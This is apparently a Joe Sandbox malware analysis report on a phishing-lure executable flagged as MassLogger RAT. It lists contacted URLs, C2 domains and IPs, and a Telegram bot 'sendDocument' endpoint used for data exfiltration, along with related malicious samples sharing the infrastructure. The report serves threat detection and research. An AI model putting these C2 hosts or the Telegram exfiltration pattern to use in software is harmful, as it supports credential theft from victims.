https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith | msedge_proxy.exe.2.dr | false | | high
http://54.244.188.177/yfypviummaqwyuq | armsvc.exe, 00000002.00000003.2169195097.0000000000974000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ww12.przvgke.biz/iwsxa?usid=25&utid=8132645662ww99.przvgke.bizc | armsvc.exe, 00000002.00000003.2288760056.0000000000982000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.0000000000984000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://ww99.przvgke.biz/7Ycs | armsvc.exe, 00000002.00000003.2690542196.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2288760056.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555725636.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2329946680.0000000000974000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://54.244.188.177:80/yfypviummaqwyuq | armsvc.exe, 00000002.00000003.2169195097.0000000000989000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://18.141.10.107/feiwbqpqckjc | armsvc.exe, 00000002.00000003.2329946680.0000000000974000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org/q | RegSvcs.exe, 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://44.221.84.105/gjuvotllw | armsvc.exe, 00000002.00000003.2187355202.000000000098F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram | RegSvcs.exe, 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://ww12.przvgke.biz/iwsxa?usid=25&utid=8132645662 | armsvc.exe, 00000002.00000003.2331664553.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2288760056.0000000000982000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.0000000000984000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2787409878.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2786700530.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2690104496.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2689707776.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555537491.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2331182641.000000000098F000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://schemas.micrXX | AppVClient.exe, 00000007.00000003.2109262975.00000000004DD000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.2109012837.00000000004D6000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.2109493299.00000000004E5000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000002.2110084231.00000000004F5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ww12.przvgke.biz/L | armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://www.openssl.org/support/faq.htmlerror | officesvcmgr.exe.2.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000011.00000002.3380159600.0000000003321000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://clients.config.office.net/manage/v1.0/serviceabilitymanager/MsaDeviceTokenMsaLastUpdatedMsaE | officesvcmgr.exe.2.dr | false | | high
http://54.244.188.177/ | armsvc.exe, 00000002.00000003.2169195097.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2121242786.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2187672356.0000000000974000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ww12.przvgke.biz/snsobwmcccpnrm?usid=25&utid=8132647334 | armsvc.exe, 00000002.00000003.2331664553.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2787409878.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2786700530.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2690104496.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2689707776.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555537491.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2331182641.000000000098F000.00000004.00000020.00020000.00000000.sdmp | true | |
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            unknown
                                                                                                                            http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTZ8fHx8fHw2NzU5NGNhZTNmarmsvc.exe, 00000002.00000003.2256408512.0000000002350000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            unknown
                                                                                                                            http://82.112.184.197/Uarmsvc.exe, 00000002.00000003.2690542196.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://reallyfreegeoip.org/xml/RegSvcs.exe, 00000011.00000002.3380159600.0000000003351000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://crash-reports.mozilla.com/submit?id=armsvc.exe, 00000002.00000003.2776140964.00000000007C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://54.244.188.177/ihnlsqbtrmkahnvarmsvc.exe, 00000002.00000003.2121150907.0000000000984000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2121242786.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://pywolwnvd.biz/armsvc.exe, 00000002.00000003.2148708963.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2149018044.0000000000998000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2121150907.000000000098F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1armsvc.exe, 00000002.00000003.2776258063.00000000007C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://checkip.dyndns.orgRegSvcs.exe, 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://18.141.10.107/jjiarmsvc.exe, 00000002.00000003.2148425780.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.autoitscript.com/autoit3/Aut2exe_x64.exe.2.drfalse
                                                                                                                                        high
                                                                                                                                        https://pcnatrk.net/track.armsvc.exe, 00000002.00000003.2279896639.0000000002390000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2256408512.0000000002350000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://reallyfreegeoip.org/xml/8.46.123.175=4RegSvcs.exe, 00000011.00000002.3380159600.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://172.234.222.138/Jarmsvc.exe, 00000002.00000003.2288760056.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://18.141.10.107/barmsvc.exe, 00000002.00000003.2329946680.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://44.221.84.105/barmsvc.exe, 00000002.00000003.2187672356.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://82.112.184.197/kdexhblwxghmjgifarmsvc.exe, 00000002.00000003.2690104496.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2689707776.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://172.234.222.138/snsobwmcccpnrmarmsvc.exe, 00000002.00000003.2288760056.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://reallyfreegeoip.orgRegSvcs.exe, 00000011.00000002.3380159600.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.winimage.com/zLibDllarmsvc.exe, 00000002.00000003.2360231003.0000000002180000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://172.234.222.138/Uarmsvc.exe, 00000002.00000003.2288760056.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://82.112.184.197/kdexhblwxghmjarmsvc.exe, 00000002.00000003.2690542196.0000000000974000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://api.telegram.orgRegSvcs.exe, 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://127.0.0.1:13556/HttpLogWriterEndpointInsiderSlabBehaviorInsiderSlabBehaviorReportedStateInsidofficesvcmgr.exe.2.drfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://ww12.przvgke.biz/armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  unknown
                                                                                                                                                  http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTd8fHx8fHw2NzU5NGNiMGMwarmsvc.exe, 00000002.00000003.2279896639.0000000002390000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  unknown
                                                                                                                                                  http://ww99.przvgke.biz/snsobwmcccpnrmarmsvc.exe, 00000002.00000003.2331664553.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2329946680.000000000096D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2689707776.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555537491.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2288760056.000000000096C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2331182641.000000000098F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  unknown
                                                                                                                                                  https://api.telegram.org/bot-/sendDocument?chat_id=RegSvcs.exe, 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffmsedge_proxy.exe.2.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.bizarmsvc.exe, 00000002.00000003.2279896639.0000000002390000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2256408512.0000000002350000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2279735972.0000000002140000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2288760056.000000000096C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2256234355.0000000002100000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://82.112.184.197/armsvc.exe, 00000002.00000003.2690542196.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555725636.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2690542196.0000000000982000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2787944261.0000000000984000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs
IP              | Domain                  | Country            | ASN   | ASN Name                                      | Malicious
----------------|-------------------------|--------------------|-------|-----------------------------------------------|----------
13.248.148.254  | 084725.parkingcrew.net  | United States      | 16509 | AMAZON-02US                                   | false
149.154.167.220 | api.telegram.org        | United Kingdom     | 62041 | TELEGRAMRU                                    | false
44.221.84.105   | saytjshyf.biz           | United States      | 14618 | AMAZON-AESUS                                  | false
193.122.6.168   | checkip.dyndns.com      | United States      | 31898 | ORACLE-BMC-31898US                            | false
54.244.188.177  | pywolwnvd.biz           | United States      | 16509 | AMAZON-02US                                   | false
72.52.179.174   | ww99.przvgke.biz        | United States      | 32244 | LIQUIDWEBUS                                   | false
13.251.16.150   | ifsaia.biz              | United States      | 16509 | AMAZON-02US                                   | false
47.129.31.212   | xlfhhhm.biz             | Canada             | 34533 | ESAMARA-ASRU                                  | false
172.234.222.138 | przvgke.biz             | United States      | 20940 | AKAMAI-ASN1EU                                 | false
82.112.184.197  | vjaxhpbji.biz           | Russian Federation | 43267 | FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU    | false
18.141.10.107   | ssbzmoy.biz             | United States      | 16509 | AMAZON-02US                                   | false
172.67.177.134  | reallyfreegeoip.org     | United States      | 13335 | CLOUDFLARENETUS                               | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572924
Start date and time: 2024-12-11 09:25:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 30
Number of new started drivers analysed: 3
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Detection: MAL
Classification: mal100.spre.troj.spyw.expl.evad.winEXE@20/155@22/12
EGA Information:
• Successful, ratio: 88.9%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Behavior information exceeds normal sizes, reducing to normal. The report will have missing behavior information.
• Excluded processes from analysis (whitelisted): SearchFilterHost.exe, dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, SearchProtocolHost.exe, WMIADAP.exe, SIHClient.exe, VSSVC.exe, WmiApSrv.exe, SearchIndexer.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big; too many NtAllocateVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                          • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
03:26:07  API Interceptor  14x Sleep call for process: armsvc.exe modified
03:26:08  API Interceptor  1x Sleep call for process: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe modified
03:26:11  API Interceptor  247198x Sleep call for process: perfhost.exe modified
03:26:21  API Interceptor  426384x Sleep call for process: RegSvcs.exe modified
03:26:45  API Interceptor  199x Sleep call for process: msdtc.exe modified
Match: IP
Columns: Associated Sample Name / URL | Detection | Threat Name | Context

13.248.148.254
  PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | ww12.przvgke.biz/fauopp?usid=18&utid=28672494417
  Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | ww12.przvgke.biz/jenyp?usid=26&utid=9204704395
  http://begantotireo.xyz | malicious | Unknown | ww38.begantotireo.xyz/favicon.ico
  http://begantotireo.xyz | malicious | Unknown | ww38.begantotireo.xyz/favicon.ico
  http://football-booster.freevisit1.com/hs-football.php?live=Greendale%20vs%20Milwaukee%20Lutheran | malicious | Unknown | ww38.watchdogsecurity.online/favicon.ico
  65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe | malicious | Bdaejec, Socelars | ww12.icodeps.com/?usid=26&utid=7334446481
  eqqjbbjMlt.elf | malicious | Unknown | ww38.fmoovies.to/
  http://www.multipool.us | malicious | Unknown | ww12.multipool.us/track.php?domain=multipool.us&caf=1&toggle=answercheck&answer=yes&uid=MTcyMDYyMjM5MS4yMjM1OjVjOTE5YWZmN2E1ZDQyNWY5MDE0Nzg0YzIwZGI1NzNiMGZkYzI3MWFiMWE0MGU0NzBjYjkyZjk4MmNlNjdjZDI6NjY4ZTlkMzczNjkwYg%3D%3D
  http://pollyfill.io | malicious | Unknown | ww38.pollyfill.io/favicon.ico
  http://simxtrackredirecttszz.pages.dev/ | malicious | Unknown | ww12.ngelit.com/favicon.ico

149.154.167.220
  DEC 2024 RFQ.exe | malicious | Snake Keylogger, VIP Keylogger | (none)
  Itaxyhi.exe | malicious | Phemedrone Stealer | (none)
  https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.com | malicious | HTMLPhisher | (none)
  Confirm revised invoice to proceed with payment ASAP.exe | malicious | GuLoader, MassLogger RAT | (none)
  17338478743bbe929069f09b2fd43b475a3f9c5d7b9e72f9a2a5695318d73f4c494b80d40d501.dat-decoded.exe | malicious | SugarDump, XWorm | (none)
  Bank Swift and SOA PRN0072700314159453_pdf.exe | malicious | GuLoader, MassLogger RAT | (none)
  HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | (none)
  ST07933.exe | malicious | GuLoader, Snake Keylogger | (none)
  fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | (none)
  Hesap_Hareketleri_10122024_html.exe | malicious | Snake Keylogger, VIP Keylogger | (none)

44.221.84.105
  HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | saytjshyf.biz/peioi
  PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | npukfztj.biz/cbecuogqej
  Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | saytjshyf.biz/bkq
  invoice_96.73.exe | malicious | FormBook | jhvzpcfg.biz/tgcwttfqletfhyq
  Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | hehckyov.biz/ircdert
  C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | hehckyov.biz/xc
  PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer | saytjshyf.biz/xyvnmtdiyfgocm
  IBKB.vbs | malicious | AgentTesla, DBatLoader, PureLog Stealer | jhvzpcfg.biz/qehuuaxgtrfd
  Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer | hehckyov.biz/of
  Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer | hehckyov.biz/sdgvcmfo
Match: Domain
Columns: Associated Sample Name / URL | Detection | Threat Name | Context (resolved IP)

przvgke.biz
  RFQ_PO N89397-GM7287-Order.bat.exe | malicious | MassLogger RAT, PureLog Stealer | 172.234.222.138
  invoice_96.73.exe | malicious | FormBook | 172.234.222.143
  Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 172.234.222.143
  C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 172.234.222.143
  PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer | 172.234.222.143
  IBKB.vbs | malicious | AgentTesla, DBatLoader, PureLog Stealer | 172.234.222.143
  Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer | 172.234.222.143

vjaxhpbji.biz
  HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 82.112.184.197
  PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 82.112.184.197
  Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | 82.112.184.197
  RFQ_PO N89397-GM7287-Order.bat.exe | malicious | MassLogger RAT, PureLog Stealer | 82.112.184.197
  invoice_96.73.exe | malicious | FormBook | 82.112.184.197
  Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 82.112.184.197
  C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 82.112.184.197
  PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer | 82.112.184.197
  IBKB.vbs | malicious | AgentTesla, DBatLoader, PureLog Stealer | 82.112.184.197
  Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer | 82.112.184.197

ssbzmoy.biz
  Request for Quotation.exe | malicious | FormBook | 18.141.10.107
  HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 18.141.10.107
  PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 18.141.10.107
  RFQ _ Virtue 054451000085.exe | malicious | FormBook | 18.141.10.107
  Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | 18.141.10.107
  RFQ_PO N89397-GM7287-Order.bat.exe | malicious | MassLogger RAT, PureLog Stealer | 18.141.10.107
  Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 18.141.10.107
  invoice_96.73.exe | malicious | FormBook | 18.141.10.107
  Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 18.141.10.107
  C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 18.141.10.107

knjghuig.biz
  HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 18.141.10.107
  PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 18.141.10.107
  Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | 18.141.10.107
  invoice_96.73.exe | malicious | FormBook | 18.141.10.107
  Order SMG 201906 20190816order.pdf.scr.exe | malicious | AgentTesla, MassLogger RAT, PureLog Stealer | 18.141.10.107
  C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 18.141.10.107
  PO #09465610_GQ 003745_SO-242000846.exe | malicious | MassLogger RAT, PureLog Stealer | 18.141.10.107
  IBKB.vbs | malicious | AgentTesla, DBatLoader, PureLog Stealer | 18.141.10.107
  Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer | 18.141.10.107
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              ORACLE-BMC-31898USConfirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                              • 193.122.6.168
                                                                                                                                                                              Josho.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 140.238.49.71
                                                                                                                                                                              Malzeme #U0130stek Formu_12102024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              • 193.122.130.0
                                                                                                                                                                              Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 158.101.44.242
                                                                                                                                                                              REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                              • 193.122.6.168
                                                                                                                                                                              Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                              • 193.122.6.168
                                                                                                                                                                              HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 193.122.6.168
                                                                                                                                                                              fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              • 193.122.130.0
                                                                                                                                                                              New_Order_List.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 193.122.6.168
                                                                                                                                                                              Request for Quotation_10.12.2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 158.101.44.242
                                                                                                                                                                              TELEGRAMRUDEC 2024 RFQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Itaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              17338478743bbe929069f09b2fd43b475a3f9c5d7b9e72f9a2a5695318d73f4c494b80d40d501.dat-decoded.exeGet hashmaliciousSugarDump, XWormBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              AMAZON-AESUShttps://zsuqwplt.cdrj.com.br/bfackjemFpbmFiLmFscmFobWFAZWphZGFoLmFlqmgtsjGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 35.173.69.207
